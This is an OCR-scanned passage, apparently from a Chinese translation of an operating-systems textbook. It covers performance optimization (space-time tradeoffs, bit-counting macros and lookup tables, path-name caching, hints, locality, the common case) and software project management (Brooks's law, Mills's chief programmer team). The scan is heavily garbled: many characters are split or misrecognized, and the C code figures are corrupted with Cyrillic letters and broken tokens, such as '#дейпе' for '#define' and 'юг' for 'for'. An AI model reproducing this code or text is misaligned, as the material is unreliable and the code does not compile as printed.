这 里 有 一 个 关于 优化 不 但 不 好 反而 更 坏 的 真实 故事 。 作 者 的 一 名 学 生 编写 了 MINIX 的 mkfs 程 序 。 该 
程序 在 一 个 新 格式 化 的 磁盘 上 布下 一 个 新 的 文件 系统 。 这 名 学 生花 了 大 约 6 个 月 的 时 间 对 其 进行 优化 ， 
包括 放 入 磁盘 高 速 缓存 。 当 他 上 交 该 程序 时 ， 它 不 能 工作 ， 需 要 另外 几 个 月 进行 调试 。 在 计算 机 的 生命 
周期 中 ， 当 系统 安装 时 ， 该 程序 典型 地 在 硬盘 上 运行 一 次 。 它 还 对 每 块 做 格式 化 的 软盘 运行 一 次 。 每 次 
运行 大 约 耗 时 2 秒 。 即 使 未 优化 的 版 本 耗 时 1 分 钟 ， 花 费 如 此 多 的 时 间 优化 一 个 很 少 使 用 的 程序 也 是 相当 
不 值 的 。 

对 于 性 能 优化 ， 一 条 相当 适用 的 口号 是 : 

足够 好 就 够 好 了 。 

通过 这 条 口号 我 们 要 表达 的 意思 是 : 性 能 一 旦 达到 一 个 合理 的 水 平 ， 榨 出 最 后 一 点 百分比 的 努力 和 
复杂 性 或 许 并 不 值得 。 如 果 调 庶 算 法 相当 公平 并 且 在 90% 的 时 间 保持 CPU 忙碌 ， 它 就 尽 到 了 自己 的 职责 。 
发 明 一 个 改进 了 5% 但 是 要 复杂 得 多 的 算法 或 许 是 一 个 坏 主意 。 类 似 地 ， 如 果 缺 页 率 足够 低 到 不 是 闫 颈 ， 
克服 重重 难关 以 获得 优化 的 性 能 通常 并 不 值得 。 避 免 灾难 比 获得 优化 的 性 能 要 重要 得 多 ， 特 别 是 针对 一 
种 负载 的 优化 对 于 另 一 种 负载 可 能 并 非 优化 的 情况 。 
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13.4.3 空间 -时 间 的 权衡 

改进 性 能 的 一 种 一 般 性 的 方法 是 权衡 时 间 与 空间 。 在 一 个 使 用 很 少 内 存 但 是 速度 比较 慢 的 算法 与 一 
个 使 用 很 多 内 存 但 是 速度 更 快 的 算法 之 间 进 行 选择 ， 这 在 计算 机 科学 中 是 经 常 发 生 的 事情 。 在 做 出 重要 
的 优化 时 ， 值 得 寻找 通过 使 用 更 多 内 存 加 快 了 速度 的 算法 ， 或 者 反 过 来 通过 做 更 多 的 计算 节省 了 宝贵 的 
内 存 的 算法 。 

一 种 常用 而 有 益 的 技术 是 用 宏 来 代替 小 的 过 程 。 使 用 宏 消除 了 通常 与 过 程 调 用 相关 联 的 开销 。 如 果 
调用 出 现在 一 个 循环 的 内 部 ， 这 种 获 益 尤其 显著 。 例 如 ， 假 设 我 们 使 用 位 图 来 跟踪 资源 ， 并 且 经 常 需要 
了 解 在 位 图 的 某 一 部 分 中 有 多 少 个 单元 是 空间 的 。 为 此 ， 我 们 需要 一 个 过 程 bit_count 来 计数 一 个 字 节 中 值 
为 1 的 位 的 个 数 。 图 13-7a 中 给 出 了 简单 明了 的 过 程 。 它 对 一 个 字 节 中 的 各 个 位 循环 ， 每 次 计数 它们 一 次 。 


#define BYTE_SIZE 8 Ar 一 个 字 节 包 含 8 个 位 */ 
int bit_ lint 
ANA Т 
inti, count = 0; 
юг (i = 0; i < BYTE_SIZE; i++) Еа MLR */ 
(Буе >>) & counts /如 果 该 位 是 1， 计 数 加 1 */ 
return(count); ар */ 


а) 


* 将 一 个 字 节 中 的 位 相 加 并 且 返 回 和 的 宏 */ 
#дейпе bit counttbJ(b&1) + (b>>1)&1) + ((b>>2)&1) + ((b>>3)&1) +\ 
((b>>4)&1) + ((b>>5)&1) + ((b>>6)&1) + ((b>>7)&1)) 


b) 


/* 在 一 个 表 中 查找 位 计数 的 宏 "/ 
char bits[256] = (0, 1, 1, 2, 1, 2, 2, 3, 1, 2, 2, 3, 2, 3, 3, 4, 1, 2, 2, 3, 2, 3, 3, ...); 
#дейпе bit_count(b) (int) bitsfb] 


2] 
图 13-7 а) 对 一 个 字 节 中 的 位 进行 计数 的 过 程 ，b) 对 位 进行 计数 的 宏 ，c) 在 表 中 查找 位 计数 

该 过 程 有 两 个 低 效 的 根源 。 首 先 ， 它 必须 被 调用 ， 必 须 为 它 分 配 栈 空间 ， 并 且 必 须 返 回 。 每 个 过 程 
调用 都 有 这 个 开销 。 第 二 ， 它 包含 一 个 循环 ， 并 且 总 是 存在 与 循环 相关 联 的 某 些 开销 。 

一 种 完全 不 同 的 方法 是 使 用 图 13-7b 中 的 宏 。 这 个 宏 是 一 个 内 联 表达 式 ， 它 通过 对 参数 连续 地 移 位 ， 
屏蔽 除 低位 以 外 的 其 他 位 ， 并 且 将 8 个 项 相 加 ， 这 样 来 计算 位 的 和 。 这 个 宏 决 不 是 一 件 艺术 作品 ， 但 是 
它 只 在 代码 中 出 现 一 次 。 当 这 个 宏 被 调用 时 ， 例 如 通过 

зит = bit_count(table[i]); 

这 个 宏 调 用 看 起 来 与 过 程 调 用 等 后 。 因 此 ， 除 了 定义 有 一 点 凌乱 以 外 ， 宏 中 的 代码 看 上 去 并 不 比 过 程 中 
的 代码 要 差 ， 但 是 它 的 效率 更 高 ， 因 为 它 消除 了 过 程 调用 的 开销 和 循环 的 开销 。 

我 们 可 以 更 进一步 研究 这 个 例子 。 究 竟 为 什么 计算 位 计数 ? 为 什么 不 在 一 个 表 中 查找 ?毕竟 只 有 256 
个 不 同 的 字 节 ， 每 个 字 节 具有 0 到 8 之 间 的 惟一 的 值 。 我 们 可 以 声明 一 个 256 项 的 表 bits， 每 一 项 (在 编译 
时 ) 初始 化 成 对 应 于 该 字 节 值 的 位 计数 。 采 用 这 一 方法 在 运行 时 根本 就 不 需要 计算 ， 只 要 一 个 变 址 操作 
就 可 以 了 。 图 13-7c 中 给 出 了 做 这 一 工作 的 宏 。 

这 是 用 内 存 换取 计算 时 间 的 明显 的 例 ， 我 们 还 可 以 再 进一步 。 如 果 需 要 整个 32 位 字 的 位 计 
数 ， 使 用 我 们 的 bit_count 宏 ， 每 个 字 我 们 需要 执行 四 次 查找 。 如 果 将 表 扩展 到 65 S36 项 ， 每 个 字 查找 两 
次 就 足够 了 ， 代 价 是 更 大 的 表 。 

在 表 中 查找 答案 可 以 用 在 其 他 方面 。 例 如 ， 在 第 7 章 中 ， 我 们 看 到 了 JPEG 图 像 压 缩 是 怎样 工作 的 ， 
它 使 用 了 相当 复杂 的 离散 余弦 变换 。 另 一 种 压缩 技术 GIF 使 用 表 查 找 来 编码 24 位 RGB 图 像 。 然 而 ，GIF 
只 对 具有 256 种 颜色 或 更 少 颜 色 的 图 像 起 作用 。 对 于 每 幅 要 压缩 的 图 像 ， 构 造 一 个 256 项 的 调 色 板 ， 每 一 
项 包含 一 个 24 位 的 RGB 值 。 压 缩 过 的 图 像 于 是 包含 每 个 像素 的 8 位 素 引 ， 而 不 是 24 位 颜色 值 ， 增 益 因子 
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为 3。 图 13-8 中 针对 一 幅 图 像 的 一 个 4 x 4 区 域 说 明了 这 一 思想 。 原 始 未 压缩 的 图 像 如 图 13-8a 所 示 ， 该 图 
中 每 个 取 值 是 一 个 24 位 的 值 ， 每 8 位 给 出 红 、 绿 和 蓝 的 强度 。GIF 图 像 如 图 13-8b 所 示 ， 该 图 中 每 个 取 值 
是 一 个 进入 调 色 板 的 8 位 索引 。 调 色 板 作为 图 像 文件 的 一 部 分 存放 ， 如 图 13-8c 所 示 。 实 际 上 ，GIF 算 法 
的 内 容 比 这 要 多 ， 但 是 思想 的 核心 是 表 查 找 。 


а) 


图 13-8 а) 每 个 像素 24 位 的 未 压缩 图 像 的 局 部 ，b) 以 GIF 压缩 的 相同 局 部 ， 每 个 像素 8 位 ，c) 调 色 板 


存在 减少 图 像 大 小 的 另 一 种 方法 ， 并 且 这 种 方法 说 明了 一 种 不 同 的 权衡 。PostScript 是 一 种 程序 设 
计 语言 ， 可 以 用 来 描述 图 像 。( 实 际 上 ， 任 何 程序 设计 语言 都 可 以 描述 图 像 ， 但 是 PostScript 专 为 这 一 目 
的 进行 了 调节 。) 许多 打印 机 具有 内 由 的 PostScript 解 释 器 ， 能 够 运行 发 送 给 它们 的 PostScript 程 序 。 

例如 ， 如 果 在 一 幅 图 像 中 存在 一 个 像素 矩形 块 具 有 相同 的 颜色 ， 用 于 该 图 像 的 PostSeript 程 序 将 携带 
指令 ， 用 来 将 一 个 矩形 放置 在 一 定 的 位 置 并 且 用 一 定 的 颜色 填充 该 矩形 。 只 需要 少数 儿 个 位 就 可 以 发 出 此 
命令 。 当 打印 机 接收 图 像 时 ， 打 印 机 中 的 解释 器 必须 运行 程序 才能 绘制 出 图 像 。 因 此 ，PostScriptl 以 更 多 的 
计算 为 代价 实现 了 数据 压缩 ， 这 是 与 表 查 找 不 同 的 一 种 权衡 ， 但 是 当 内 存 或 带宽 不 足 时 是 具有 价值 的 。 

其 他 的 权衡 经 常 牵涉 数据 结构 。 双 向 链表 比 单 向 链表 占据 更 多 的 内 存 ， 但 是 经 常 使 得 访问 表 项 速度 
更 快 。 散 列表 其 至 更 浪费 空间 ， 但 是 要 更 快 。 简 而 言 之 ， 当 优化 一 段 代 码 时 要 考虑 的 重要 事情 之 一 是 ， 
使 用 不 同 的 数据 结构 是 否 将 产生 最 佳 的 时 间 一 空间 平衡 。 


13.4.4 高 速 缓存 

用 于 改进 性 能 的 一 种 众所周知 的 技术 是 高 速 缓存 。 在 任何 相同 的 结果 可 能 需要 多 次 的 情况 下 ， 高 速 
缓存 都 是 适用 的 。 一 般 的 方法 是 首先 做 完整 的 工作 ， 然 后 将 结果 保存 在 高 速 缓存 中 。 对 于 后 来 的 尝试 ， 
首先 要 检查 高 速 缓存 。 如 果 结 果 在 高 速 缓存 中 ， 就 使 用 它 。 否 则 ， 再 做 完整 的 工作 。 

我 们 已 经 看 到 高 速 缓存 在 文件 系统 内 部 的 运用 ， 在 高 速 缓存 中 保存 一 定数 目 最 近 用 过 的 磁盘 块 ， 这 
样 在 每 次 命中 时 就 可 以 省 略 磁盘 读 操作 。 然 而 ， 高 速 缓存 还 可 以 用 于 许多 其 他 目的 。 例 如 ， 解析 路 径 名 
就 代价 高 昂 得 令 人 吃惊 。 再 次 考虑 图 4-35 中 UNIX 的 例子 。 为 了 查找 /usrrasyVmbox， 需 要 如 下 的 磁盘 访问 : 

Т) 读 入 根 目录 的 i 节点 (i 节点 1)。 

2) 读 入 根 目录 (磁盘 块 1) 。 

3) 读 入 /usr 的 i 节点 (i 节点 6)。 

4) 读 人 /usr 目 录 (磁盘 块 132)。 

5) 读 入 /usr/ast 的 i 节点 (i 节点 26)。 


©) 读 入 /usrfast 目 录 (磁盘 块 106)。 с. (зс: э“ 
只 是 为 了 获得 文件 的 节点 号 就 需要 6 次 磁盘 访问 。 然 后 必须 读 A N 
入 i 节点 本 身 以 获得 磁盘 块 号 。 如 果 文件 小 于 块 的 大 小 (例如 ma 
1024 字 节 )， 那 么 需要 8 次 磁盘 访问 才 读 到 数据 。 йит | во) 

基 些 系统 通过 对 《路 径 ，i 节 点 ) 的 组 合 进行 高 速 缓存 来 лайно s 
优化 路 径 名 的 解析 。 对 于 图 4-35 的 例子 ， 在 解析 /usr/ast/mbox Tapaa 5 


之 后 ， 高 速 缓存 中 肯定 会 保存 图 13-9 的 前 三 项 。 最 后 三 项 来 自 Peo 
解析 其 他 路 径 。 图 13-9 图 4.35 的 i 世 点 高 速 缓存 的 局 部 
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当 必 须 查找 一 个 路 径 时 ， 名 字 解 析 器 首先 查阅 高 速 缓存 并 搜索 它 以 找到 高 速 缓存 中 存在 的 最 长 的 子 
字符 串 。 例 如 ， 如 果 存在 路 径 /usrfasVgrants/stw， 高 速 缓存 会 返回 /usrfast/ 是 i 节 点 26 这 样 的 事实 ， 这 样 搜 
索 就 可 以 从 这 里 开始 ， 消 除了 四 次 磁盘 访问 。 

对 路 径 进行 高 速 缓存 存在 的 一 个 问题 是 ， 文 件 名 与 i 节 点 号 之 间 的 映射 并 不 总 是 固定 的 。 假 设 文件 
/usrasVmbox 从 系统 中 被 删除 ， 并 且 其 i 节 点 重用 于 不 同 用 户 所 拥有 的 不 同 的 文件 。 随 后 ， 文 件 /usr/ 
astUmbox 再 次 被 创建 ， 并 且 这 一 次 它 得 到 i 节 点 106。 如 果 不 对 这 件 事 情 进 行 预 防 ， 高 速 缓存 项 现在 将 是 
错误 的 ， 并 且 后 来 的 查找 将 返回 错误 的 ;节点 号 。 为 此 ， 当 一 个 文件 或 目录 被 嗣 除 时 ， 它 的 高 速 级 存 项 
以 及 (如 果 它 是 一 个 目录 的 话 ) 它 下 面 所 有 的 项 都 必须 从 高 速 缓存 中 清除 。 

磁盘 块 与 路 径 名 并 不 是 能 够 高 速 级 存 的 惟一 项 目 ，i 节 点 也 可 以 被 高 速 缓存 。 如 果 弹 出 的 线程 用 来 
处 理 中 断 ， 每 个 这 样 的 线程 需要 一 个 栈 和 某 些 附加 的 机 构 。 这 些 以 前 用 过 的 线程 也 可 以 被 高 速 缓存 ， 因 
为 剧 新 一 个 用 过 的 线程 比 从 头 创建 一 个 新 的 线程 更 加 容易 (为 了 避免 必须 分 配 内 存 )。 难 于 生产 的 任何 
事物 几乎 都 能 够 被 高 速 缓存 。 


13.4.5 线索 

高 速 缓存 项 总 是 正确 的 。 高 速 缓存 搜索 可 能 失败 ， 但 是 如 果 找到 了 一 项 ， 那 么 这 一 项 保证 是 正确 的 
并 且 无 需 再 费 周折 就 可 以 使 用 。 在 某 些 系统 中 ， 包 含 线索 (hint) 的 表 是 十 分 便利 的 。 这 些 线索 是 关于 
答案 的 暗示 ， 但 是 它们 并 不 保证 是 正确 的 。 调 用 者 必须 自行 对 结果 进行 验证 。 

众所周知 的 关于 线索 的 例子 是 了 在 Web 页 上 的 URL。 点 击 一 个 链接 并 不 能 保证 被 指向 的 Web 页 就 在 
那里 。 事 实 上 ， 被 指向 的 网 页 可 能 10 年 前 就 被 副 除 了 。 因 此 包含 URL 的 网 页 上 面 的 信息 只 是 一 个 线索 。 

线索 还 用 于 连接 远程 文件 。 信 息 是 提示 有 关 远 程 文件 某 些 事项 的 线索 ， 例 如 文件 存放 的 位 置 。 然 而 ， 自 
该 线索 被 记录 以 来 ， 文 件 可 能 已 经 被 移动 或 者 被 副 除 了 ， 所 以 为 了 明确 线索 是 否 正确 ， 总 是 需要 进行 检查 。 


13.4.6 利用 局 部 性 

进程 和 程序 的 行为 并 不 是 随机 的 ， 它 们 在 时 间 上 和 空间 上 展现 出 相当 程度 的 局 部 性 ， 并 且 可 以 以 各 
种 方式 利用 该 信息 来 改进 性 能 。 空 间 局 部 性 的 一 个 常见 例子 是 这 样 的 事实 : 进程 并 不 是 在 其 地 址 空间 内 
部 随机 地 到 处 跳 转 的 。 在 一 个 给 定 的 时 间 间 隔 内 ， 它 们 倾向 于 使 用 数目 比较 少 的 页 面 。 进 程 正在 有 效 地 
使 用 的 页 面 可 以 被 标记 为 它 的 工作 集 ， 并 且 操作 系统 能 够 确保 当 进程 被 允许 运行 时 ， 它 的 工作 集 在 内 存 
中 ， 这 样 就 减少 了 缺 页 的 次 数 。 

局 部 化 原理 对 于 文件 也 是 成 立 的 。 当 一 个 进程 选择 了 一 个 特定 的 工作 目录 时 ， 很 可 能 将 来 许多 文件 
引用 将 指向 该 目录 中 的 文件 。 通 过 在 磁盘 上 将 每 个 目录 的 所 有 i 节点 和 文件 就 近 放 在 一 起 ， 可 能 会 获得 
性 能 的 改善 。 这 一 原理 正 是 Berkeley 快 速 文件 系统 的 基础 《McKusick 等 人 ，1984)。 

局 部 性 起 作用 的 另 一 个 领域 是 多 处 理 器 系统 中 的 线程 调度 。 正 如 我 们 在 第 8 章 中 看 到 的 ， 在 多 处 理 
器 上 一 种 调度 线程 的 方法 是 试图 在 最 后 一 次 用 过 的 CPU 上 运行 每 个 线程 ， 期 望 它 的 某 些 内 存 块 依然 还 在 
内 存 的 高 速 缓 在 中 。 

13.4.7 优化 常见 的 情况 

区 分 最 常见 的 情况 和 最 坏 可 能 的 情况 并 且 分 别处 理 它们 ， 这 通常 是 一 个 好 主意 。 针 对 这 两 者 的 代码 
常常 是 相当 不 同 的 。 重 要 的 是 要 使 常见 的 情况 速度 快 。 对 于 最 坏 的 情况 ， 如 果 它 很 少 发 生 ， 使 其 正确 就 
足够 了 。 

第 一 个 例子 ， 考 虑 进入 一 个 临界 区 。 在 大 多 数 时 间 中 ， 进 入 将 是 成 功 的 ， 特 别 是 如 果 进 程 在 临界 区 
内 部 不 花费 很 多 时 间 的 话 。Windows Vista 提 供 的 一 个 Win32 API 调 用 EnterCriticalSection 就 利用 了 这 一 
期 望 ， 它 自动 地 在 用 户 态 测试 一 个 标志 (使 用 TSL 或 等 价 物 )。 如 果 测 试 成 功 ， 进 程 只 是 进入 临界 区 并 
且 不 需要 内 核 调用 。 如 果 测 试 失败 ， 库 过 程 将 调用 一 个 信号 量 上 的 down 操 作 以 阻塞 进程 。 因 此 ， 在 通 
常情 况 下 是 不 需要 内 核 调用 的 。 

第 二 个 例子 ， 考 虚设 置 一 个 警报 (在 UNIX 中 使 用 信号 )。 如 果 当 前 没有 警报 待 完 成 ， 那 么 构造 一 个 
警报 并 且 将 其 放 在 定时 器 队列 上 是 很 简单 的 。 然 而 ， 如 果 已 经 有 一 个 警报 待 完成 ， 那 么 就 必须 找到 它 并 
且 从 定时 器 队列 中 删除 。 由 于 alarm 调 用 并 未 指明 是 否 已 经 设置 了 一 个 警报 ， 所 以 系统 必须 假设 最 坏 的 
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情况 ， 即 有 一 个 警报 。 然 而 ， 由 于 大 多 数 时 间 不 存在 警报 待 完成 ， 并 且 由 于 删除 一 个 现 有 的 警报 代价 高 
昂 ， 所 以 区 分 这 两 种 情况 是 一 个 好 主意 。 

做 这 件 事情 的 一 种 方法 是 在 进程 表 中 保留 一 个 位 ， 表 明 是 否 有 一 个 警报 待 完成 。 如 果 这 一 位 为 0， 
就 好 办 了 (只 是 添加 一 个 新 的 定时 器 队列 项 而 无 须 检 查 )。 如 果 该 位 为 !， 则 必须 检查 定时 器 队列 。 


13.5 项 目 管理 

程序 员 是 天 生 的 乐观 主义 者 。 他 们 中 的 大 多 数 认为 编写 程序 的 方式 就 是 急切 地 奔 向 键盘 并 且 开始 击 
键 ， 不 久 以 后 完全 调试 好 的 程序 就 完成 了 。 对 于 非常 大 型 的 程序 ， 事 实 并 非 如 此 。 在 下 面 几 节 ， 关 于 管 
理 大 型 软件 项 目 ， 特 别 是 大 型 操作 系统 项 目 ， 我 们 有 一 些 看 法 要 陈述 。 


13.5.1 人 月 神话 

经 典 著作 《人 月 神话 》 的 作者 Fred Brooks 是 OS/360 的 设计 者 之 一 ， 他 后 来 转向 了 学 术 界 。 在 这 部 
经 典 著作 中 ，Fred Brooks 讨 论 了 建造 大 型 操作 系统 为 什么 如 此 艰难 的 问题 (Brooks, 1975, 1995)。 当 大 
多 数 程序 员 看 到 他 声称 程序 员 在 大 型 项 目 中 每 年 只 能 产 出 1000 行 调试 好 的 代码 时 ， 他 们 怀疑 Brooks 教 授 
是 否 生活 在 外 层 空间 ， 或 许 是 在 臭虫 性 (Planet Bug 一 一 此 处 Bug 为 双关 语 ) 上 。 毕 竟 ， 他 们 中 的 大 多 数 
在 熬夜 的 时 候 一 个 晚上 就 可 以 产 出 1000 行 程序 。 这 怎么 可 能 是 任何 一 个 IQ 大 于 50 的 人 一 年 的 产 出 呢 ? 

Brooks 指 出 的 是 ， 具 有 几 百 名 程序 员 的 大 型 项 目 完全 不 同 于 小 型 项 目 ， 并 且 从 小 型 项 目 获 得 的 结果 并 不 
能 放大 到 大 型 项 目 。 在 一 个 大 型 项 目 中 ， 甚 至 在 编码 开始 之 前 ， 大 量 的 时 间 就 消耗 在 规划 如 何 将 工作 划分 成 
模块 、 仔 细 地 说 明 模块 及 其 接口 ， 以 及 试图 设想 模块 将 怎样 互相 作用 这 样 的 事情 上 。 然 后 ， 模 块 必 须 独立 地 
编码 和 调 坛 。 最 后 ， 模 块 必须 集成 起 来 并 且 必 须 将 系统 作为 一 个 整体 来 测试 。 通 常 的 情况 是 ， 每 个 模块 单独 
测试 时 工作 得 十 分 完美 ， 但 是 当 所 有 部 分 集成 在 一 起 时 ， 系 统 立 刻 崩溃 。Brooks 将 工作 量 估计 如 下 ， 

。1/3 规 划 

，1/6 编 码 

“1/4 模 块 测试 

。1/4 系 统 测 试 

换言之 ， 编 写 代码 是 容易 的 部 分 ， 困 难 的 部 分 是 断定 应 该 有 哪些 模块 并 且 使 模块 A 与 模块 B 正 确 地 
交互 。 在 由 一 名 程序 员 编写 的 小 型 程序 中 ， 留 待 处 理 的 所 有 部 分 都 是 简单 的 部 分 。 

Brooks 的 书 的 标题 来 自 他 的 断言 ， 即 人 与 时 间 是 不 可 互 换 的 。 不 存在 “人 月 ”这 样 的 单位 。 如 果 一 
个 项 目 需 要 15 个 人 花 2 年 时 间 构 建 ， 很 难 想像 360 个 人 能 够 在 1 个 月 内 构建 它 ， 甚至 让 60 个 人 在 6 个 月 内 做 
出 它 或 许 也 是 不 可 能 的 。 

产生 这 一 效应 有 三 个 原因 。 第 一 ， 工 作 不 可 能 完全 并 行 化 。 直 到 完成 规划 并 且 确 定 了 需要 哪些 模块 
以 及 它们 的 接口 ， 甚 至 都 不 能 开始 编码 。 对 于 一 个 2 年 的 项 目 ， 仅 仅 规划 可 能 就 要 花费 8 个 月 。 

第 二 , 为 了 完全 利用 数目 众多 的 程序 员 ， 工作 必须 划分 成 数目 众多 的 模块 ， 这 样 每 个 人 才能 有 事情 做 。 
由 于 每 个 模块 可 能 潜在 地 与 每 个 其 他 模块 相互 作用 ， 需 要 将 模块 -模块 相互 作用 的 数目 看 成 随 着 模块 数目 
的 平方 而 增长 ， 也 就 是 说 ， 随 着 程序 员 数 目的 平方 而 增长 。 这 一 复杂 性 很 快 就 会 失去 控制 。 对 于 大 型 项 目 

言 ， 人 与 月 之 间 的 权衡 远 不 是 线性 的 ， 对 63 个 软件 项 目 精细 的 测量 证 实 了 这 一 点 (Boehm, 1981), 

第 三 ,调试 工作 是 高 度 序 列 化 的 。 对 于 一 个 问题 ,安排 10 名 调试 人 员 并 不 会 加 快 10 倍 发 现 程序 错误 。 
事实 上 ，10 名 调试 人 员 或 许 比 一 名 调试 人 员 还 要 慢 ， 因 为 他 们 在 相互 沟通 上 要 浪费 太 多 的 时 间 。 

对 于 人 员 与 时 间 的 权衡 ，Brooks 将 他 的 经 验 总 结 在 Brooks 定 律 中， 

对 于 一 个 延期 的 软件 项 目 ， 增 加 人 力 将 使 它 更 加 廷 期 。 

增加 人 员 的 问题 在 于 他 们 必须 在 项 目 中 获得 培训 ， 模 块 必须 重新 划分 以 便 与 现在 可 用 的 更 多 数目 的 
程序 员 相 匹配 ， 需 要 开 许多 会 议 来 协调 各 方面 的 努力 等 。Abdel-Hamid 和 Madnick (1991) 用 实验 方法 
证 实 了 这 一 定律 。 用 稍稍 不 敬 的 方法 重 述 Brooks 定 律 就 是 ; 

无 论 分 配 多 少妇 女 从 事 这 一 工作 ， 生 一 个 孩子 都 需要 9 个 月 。 


13.5.2 团队 结构 
商业 操作 系统 是 大 型 的 软件 项 目 ， 总 是 需要 大 型 的 人 员 团 队 。 人 员 的 质量 极为 重要 。 几 十 年 来 人 们 
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已 经 众所周知 的 是 ， 项 尖 的 程序 员 比 拙劣 的 程序 员 生产 率 要 高 出 10 倍 (Sackman 等 人 ，1968)。 麻 烦 在 于 ， 
当 你 需要 200 名 程序 员 时 ， 找 到 200 名 顶尖 的 程序 员 非 常 困难 ， 对 于 程序 员 的 质量 你 不 得 不 有 所 将 就 。 

在 任何 大 型 的 设计 项 目 (软件 或 其 他 ) 中 ， 同样 重 要 的 是 需要 体系 结构 的 一 致 性 。 应 该 有 一 名 才智 
超群 的 人 对 设计 进行 控制 。Brooks 引 证 兰 斯 大 教堂 8 作为 大 型 项 目的 例子 ， 兰 斯 大 教堂 的 建造 花费 了 几 
十 年 的 时 间 ， 在 这 一 过 程 中 ， 后 来 的 建筑 师 完全 服从 于 完成 最 初 风 格 的 建筑 师 的 规划 。 结 果 是 其 他 欧洲 
大 教堂 无 可 比拟 的 建筑 结构 的 一 致 性 。 


在 20 世 纪 70 年 代 ，Harlan Mills 把 “一 些 程序 员 比 其 他 程序 员 要 好 很 多 ”的 观察 结果 与 对 体系 结构 
一 致 性 的 需要 相 结合 ， 提 出 了 首席 程序 员 团队 (chief programmer team) 的 范式 (Baker, 1972)。 他 的 思 
想 是 要 像 一 个 外 科 手 术 团队 ， 而 不 是 像 一 个 杀 猪 必 夫 团队 那样 组 织 一 个 程序 员 团 队 。 不 是 每 个 人 像 疯 子 
一 样 乱 砍 一 气 ， 而 是 由 一 个 人 掌握 着 手术 刀 ， 其 他 人 在 那里 提供 支持 。 对 于 一 个 10 名 人 员 的 项 目 ，Mills 
建议 的 团队 结构 如 图 13-10 所 示 。 
ЕТЕ R й 

首席 程序 员 执行 体系 结构 设计 并 编写 代码 

副手 辅助 首席 程序 员 并 为 其 提供 咨询 

行政 主管 管理 人 员 、 预 算 、 空 间 、 设 备 、 报 告 等 

编辑 编辑 文档 ， 而 文档 必须 由 首席 程序 员 编写 

秘书 行政 主管 和 编辑 各 需要 一 名 秘书 

程序 文书 维护 代码 和 文档 档案 

工具 师 提供 首席 程序 员 需 要 的 任何 工具 

测试 员 测试 首席 程序 员 的 代码 

语言 律师 兼职 人 员 ， 他 可 以 就 语言 向 首席 程序 员 提供 建议 


图 13-10 Mills 建 议 的 10 人 首席 程序 员 团队 的 分 工 


自从 提出 这 一 建议 并 付 诸 实施 ，30 年 过 去 了 。 一 些 事情 已 经 变化 (例如 需要 一 个 语言 层 一 一 C 比 
PL/1 更 为 简单 )， 但 是 只 需要 一 名 才智 超群 的 人 员 对 设计 进行 控制 仍然 是 正确 的 。 并 且 这 名 才智 超群 者 
在 设计 和 编程 上 应 该 能 够 100% 地 起 作用 ， 需要 支持 人 员 。 尽 管 借助 于 计算 机 的 帮助 ， 现 在 一 个 更 
小 的 支持 人 员 队 伍 就 足够 了 。 但 是 在 本 质 上 ， 这 一 思想 仍然 是 有 效 的 。 

任何 大 型 项 目 都 需要 组 织 成 层次 结构 。 底 层 是 许多 小 的 团队 ， 每 个 团队 由 首席 程序 员 领 导 。 在 下 一 
层 ， 必 须 由 一 名 经 理 人 对 一 组 团队 进行 协调 。 经 验 表 明 ， 你 所 管理 的 每 一 个 人 将 花费 你 10% 的 时 间 ， 所 
以 每 10 个 团队 的 一 个 小 组 就 需要 一 名 全 职 的 经 理 人 。 这 些 经 理 人 也 必须 被 管理 。 

Brooks 观 察 到 ， 坏 消息 不 能 很 好 地 沿 着 树 向 上 传播 。 麻 省 理工 学 院 的 Jerry Saltzer 将 这 一 效应 称 为 
坏 消 息 二 极 管 (bad-news diode), 因为 存在 着 在 两 千年 前 将 带 来 坏 信息 的 信使 斩首 的 古老 传统 ， 所 以 首 
席 程 序 员 或 经 理 人 都 不 愿意 告诉 他 的 老板 项 目 延期 了 4 个 月 ， 并 且 无 论 如 何 都 没有 满足 最 终 时 限 的 机 会 。 
因此 ， 项 层 管理 者 就 项 目的 状态 通常 不 明 就 里 。 当 不 能 满足 最 终 时 限 的 情况 变 得 十 分 明显 时 ， 顶层 管理 
者 的 响应 是 增加 和 人 员 ， 此 时 Brooks 定 律 就 起 作用 了 。 

实际 上 ， 大 型 公司 拥有 生产 软件 的 丰富 经 验 并 且 知 道 如 果 它 随意 地 生产 会 发 生 什么 ， 这 样 的 公司 趋 
向 于 至 少 是 试图 正确 地 做 事情 。 相 反 ， 较 小 的 、 较 新 的 公司 ， 匆匆 忙 忙 地 希望 其 产品 早日 上 市 ， 不 能 总 
是 仔细 地 生产 他 们 的 软件 。 这 经 常 导致 远 远 不 是 最 优化 的 结果 。 

Brooks 和 Mills 都 没有 预见 到 开放 源码 运动 的 成 长 。 尽 管 该 运动 取得 了 某 些 成 功 ， 但 是 一 旦 新 鲜 感 
消失 ， 它 是 否 还 是 生产 大 量 高 质量 软件 的 切实 可 行 的 模型 还 有 竺 观察。 回想 早年 无 线 电 广播 是 由 业余 无 
线 电 操作 人 员 占据 支配 地 位 的 ， 但 是 很 快 就 让 位 于 商业 无 线 电 台 和 后 来 的 商业 电视 台 。 值 得 注意 的 是 ， 
最 为 成 功 的 开放 源码 软件 项 目 显然 使 用 了 首席 程序 员 模型 ， 有 一 名 才智 超群 者 控制 着 体系 结构 设计 ( 例 
如 ，Linus Torvalds 控 制 着 Linux 内 核 ， 而 Richard Stallman 控 制 着 GNU C 编 译 器 ) 。 


Ө 兰 斯 (Reims) 一 一 法 国 东北 部 城市 。 一 一 译 者 注 
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13.5.3 经 验 的 作用 

拥有 丰富 经 验 的 设计 人 员 对 于 一 个 操作 系统 项 目 来 说 至 关 重 要 。Brooks 指 出 ， 大 多 数 错误 不 是 在 代 
码 中 ， 而 是 在 设计 中 。 程 序 员 正 确 地 做 了 吟 听 他 们 要 做 的 事情 ， 而 吟 哇 他 们 要 做 的 事情 是 错误 的 。 青 多 
测试 软件 都 无 法 弥补 精 糕 的 设计 说 明 书 。 

Brooks 的 解决 方案 是 放弃 图 13-11a 的 经 典 开发 模型 而 采用 图 13-1lb 的 模型 。 此 处 的 想法 是 首先 编写 
一 个 主 程序 ， 它 仅仅 调用 项 层 过 程 ， 而 顶层 过 程 最 初 是 哑 过 程 。 从 项 目的 第 一 天 开始 ， 系 统 就 可 以 编译 
和 运行 ， 尽 管 它 什么 都 做 不 了 。 随 着 时 间 的 流逝 ， 模 块 被 插入 到 完全 的 系统 中 。 这 一 方法 的 成 效 是 系统 
集成 测试 能 够 持续 地 执行 ， 这 样 设 计 中 的 错误 就 可 以 更 早 地 显露 出 来 。 实 际 上 ， 拙 劣 的 设计 决策 导致 的 
